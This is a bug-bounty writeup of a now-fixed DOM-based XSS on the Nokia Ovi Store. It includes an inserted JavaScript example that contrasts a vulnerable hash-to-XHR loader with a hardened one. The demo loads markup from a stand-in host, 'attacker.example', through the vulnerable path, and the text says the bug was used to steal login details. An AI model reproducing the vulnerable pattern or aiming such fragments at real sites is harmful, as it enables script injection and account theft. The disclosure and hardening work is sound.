Vulnerability Type: Cross Site Scripting
Vulnerable Domain: http://store.ovi.com/
Status: Fixed
Detailed Writeup: Last year, I reported a critical DOM-based cross-site scripting vulnerability on the homepage of the Nokia Ovi Store, http://store.ovi.com/. The website uses the CORS (Cross-Origin Resource Sharing) mechanism to load content into a particular area (div) of the page via XMLHttpRequests. So let's look at one of the URLs:
http://store.ovi.com/#/applications?categoryId=14
The location of the content to be loaded into that div is given in the URL, i.e. in location.hash. I use DOMinator often; it's a very useful tool. So I fuzzed the URL with DOMinator and got something like this:
1 alert whose source is location.hash and whose sink is XMLHttpRequest.open. Pretty nice 🙂. I opened the URL in Google Chrome, and in the console tab I got this:
I tried putting in some junk text just to see what was going on. For example,
http://store.ovi.com/#/jasminder
will result in the following.
Since the sink was XMLHttpRequest.open, I tried putting my own website after the hash, but...
Now there was a dedicated XHR sent to my domain. After bypassing the same-origin policy, I could get JavaScript executed on the site.
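The bug described above is a source-to-sink flow: location.hash is used unvalidated as the URL passed to XMLHttpRequest.open, and whatever the request returns is written into the page as markup. The following is an added example, not the Ovi Store's own code: it models that vulnerable loader next to a hardened one that resolves the fragment against the page's own origin, rejects anything that would leave it (including protocol-relative and backslash forms), and allowlists the content routes the page actually serves. The origin constant, the route names and the fake XMLHttpRequest layer are assumptions constructed for the example so it runs offline.

```javascript
// Added example (not the Ovi Store's code). ORIGIN, the route allowlist and the
// fake XHR layer are constructed for illustration.
const ORIGIN = 'http://store.ovi.com';

// Vulnerable pattern from the writeup: strip the '#' and hand the rest straight
// to XMLHttpRequest.open(). A fragment like '#//attacker.example/' resolves to
// another origin, so the XHR leaves the site.
function unsafeTargetFromHash(hash) {
  return hash.slice(1); // '#/applications?categoryId=14' -> '/applications?categoryId=14'
}

// Hardened: treat the fragment as an untrusted path, resolve it against the
// page's own origin, and refuse anything that does not stay on that origin.
// Returns the same-origin path+query to load, or null if the fragment is rejected.
function resolveFragment(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  // Exactly one leading slash: '//host' is protocol-relative, 'http:' is absolute.
  if (!/^\/(?!\/)/.test(raw)) return null;
  // Backslashes are normalised to slashes by URL parsing; control chars are junk.
  if (/[\\\u0000-\u001f]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw, ORIGIN);
  } catch (e) {
    return null;
  }
  if (url.origin !== ORIGIN) return null;
  // Only the content routes this page is meant to load (constructed allowlist).
  if (!/^\/(applications|games|search)(\/|$)/.test(url.pathname)) return null;
  return url.pathname + url.search;
}

// Constructed stand-in for the network so both loaders can run offline.
// The attacker-origin response stands for a CORS-enabled page the attacker serves.
const fakeResponses = {
  'http://store.ovi.com/applications?categoryId=14': '<ul><li>App list</li></ul>',
  'http://attacker.example/': '<b>attacker-controlled markup</b>',
};
function fakeXhr(url) {
  return fakeResponses[url] || '';
}

// Vulnerable loader: fragment -> XHR -> innerHTML, with no origin check.
// Returns the URL that was actually requested.
function loadUnsafe(hash, container, xhr = fakeXhr) {
  const target = new URL(unsafeTargetFromHash(hash), ORIGIN).href;
  container.innerHTML = xhr(target); // whatever came back is now live DOM
  return target;
}

// Hardened loader: the request can only go to an allowlisted same-origin route.
// Returns the URL requested, or null when the fragment was rejected.
function loadHardened(hash, container, xhr = fakeXhr) {
  const path = resolveFragment(hash);
  if (path === null) {
    container.innerHTML = '';
    return null;
  }
  const target = ORIGIN + path;
  container.innerHTML = xhr(target);
  return target;
}

// Stand-alone demonstration.
if (typeof require !== 'undefined' && require.main === module) {
  const div = {};
  console.log(loadUnsafe('#//attacker.example/', div), div.innerHTML);      // cross-origin fetch lands in the DOM
  console.log(loadHardened('#//attacker.example/', div), div.innerHTML);    // null, nothing loaded
  console.log(loadHardened('#/applications?categoryId=14', div), div.innerHTML);
}
```

The origin comparison is the check that actually closes the hole; the allowlist on top of it means an unexpected path such as the junk text tried above is refused rather than forwarded to the server, which is also a cheap signal to log when hunting for this class of bug.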
This DOM-based XSS affected the whole site. Below is the video PoC of how I exploited this vulnerability to steal any user's login details. Enjoy it 🙂
I got a Nokia Lumia 820 as a reward for this vulnerability.
Thanks to the following people:
https://twitter.com/kkotowicz
https://twitter.com/WisecWisec
https://twitter.com/netfuzzer